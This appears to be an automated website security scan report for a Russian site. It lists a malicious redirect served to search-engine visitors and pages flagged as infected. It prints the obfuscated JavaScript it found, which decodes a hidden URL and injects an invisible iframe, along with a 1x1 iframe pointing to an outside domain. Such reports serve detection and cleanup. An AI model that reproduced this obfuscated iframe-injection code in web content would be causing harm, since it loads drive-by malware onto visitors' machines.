Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://jma-house.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: jma-house.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 10 Sep 2014 21:21:24 GMT Location: http://spyware-files.info/0/go.php?sid=2 Server: Apache Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://jma-house.ru/ | 200 OK Content-Length: 6869 Content-Type: text/html | clean |
http://jma-house.ru/templates/jma-house/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8029 Content-Type: application/x-javascript | clean |
http://jma-house.ru/../../Scripts/AC_RunActiveContent.js | 400 Bad Request Content-Length: 2862 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3c%62%20%69%64%3d%22%62%39%37%30%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%22%3e%40%25%40%5e%36%5e%38%5e%40%25%40%5e%37%5e%34%5e%40%25%40%5e%37%5e%34%5e%40%25%40%5e%37%5e%30%5e%40%25%40%5e%33%5e%61%5e%40%25%40%5e%32%5e%66%5e%40%25%40%5e%32%5e%66%5e%40%25%40%5e%36%5e%39%5e%40%25%40%5e%36%5e%63%5e%40%25%40%5e%36%5e%63%5e%40%25%40%5e%37%5e%35%5e%40%25%40%5e%37%5e%33%5e%40%25%40%5e%36%5e%39%5e%40%25%40%5e%36%5e%66%5e%40%25%40%5e%36%5e%65%5e%40%25%40% Decoded script: <b id="b970" style="display:none;">@%@^6^8^@%@^7^4^@%@^7^4^@%@^7^0^@%@^3^a^@%@^2^f^@%@^2^f^@%@^6^9^@%@^6^c^@%@^6^c^@%@^7^5^@%@^7^3^@%@^6^9^@%@^6^f^@%@^6^e^@%@^6^6^@%@^6^5^@%@^7^3^@%@^7^4^@%@^2^e^@%@^7^2^@%@^7^5^@%@^2^f^@%@^6^3^@%@^6^f^@%@^7^0^@%@^6^5^@%@^7^2^@%@^6^6^@%@^6^9^@%@^6^c^@%@^6^4^@%@^2^e^@%@^6^8^@%@^7^4^@%@^6^d^@%@^6^c^</b> document.write('<iframe src=\''+unescape(document.getElementById('b970').innerHTML.replace(/[\+!*^#@$]/g,""))+'\'></iframe>'); Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://glondis.cn/in.cgi?4 <iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?4" /> | ||
http://jma-house.ru/test404page.js | 404 Not Found Content-Length: 2806 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3c%62%20%69%64%3d%22%62%39%37%30%22%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%22%3e%40%25%40%5e%36%5e%38%5e%40%25%40%5e%37%5e%34%5e%40%25%40%5e%37%5e%34%5e%40%25%40%5e%37%5e%30%5e%40%25%40%5e%33%5e%61%5e%40%25%40%5e%32%5e%66%5e%40%25%40%5e%32%5e%66%5e%40%25%40%5e%36%5e%39%5e%40%25%40%5e%36%5e%63%5e%40%25%40%5e%36%5e%63%5e%40%25%40%5e%37%5e%35%5e%40%25%40%5e%37%5e%33%5e%40%25%40%5e%36%5e%39%5e%40%25%40%5e%36%5e%66%5e%40%25%40%5e%36%5e%65%5e%40%25%40% Decoded script: <b id="b970" style="display:none;">@%@^6^8^@%@^7^4^@%@^7^4^@%@^7^0^@%@^3^a^@%@^2^f^@%@^2^f^@%@^6^9^@%@^6^c^@%@^6^c^@%@^7^5^@%@^7^3^@%@^6^9^@%@^6^f^@%@^6^e^@%@^6^6^@%@^6^5^@%@^7^3^@%@^7^4^@%@^2^e^@%@^7^2^@%@^7^5^@%@^2^f^@%@^6^3^@%@^6^f^@%@^7^0^@%@^6^5^@%@^7^2^@%@^6^6^@%@^6^9^@%@^6^c^@%@^6^4^@%@^2^e^@%@^6^8^@%@^7^4^@%@^6^d^@%@^6^c^</b> document.write('<iframe src=\''+unescape(document.getElementById('b970').innerHTML.replace(/[\+!*^#@$]/g,""))+'\'></iframe>'); Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://glondis.cn/in.cgi?4 <iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?4" /> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jma-house.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jma-house.ru/
Result: jma-house.ru is not infected or malware details are not published yet.
Result: jma-house.ru is not infected or malware details are not published yet.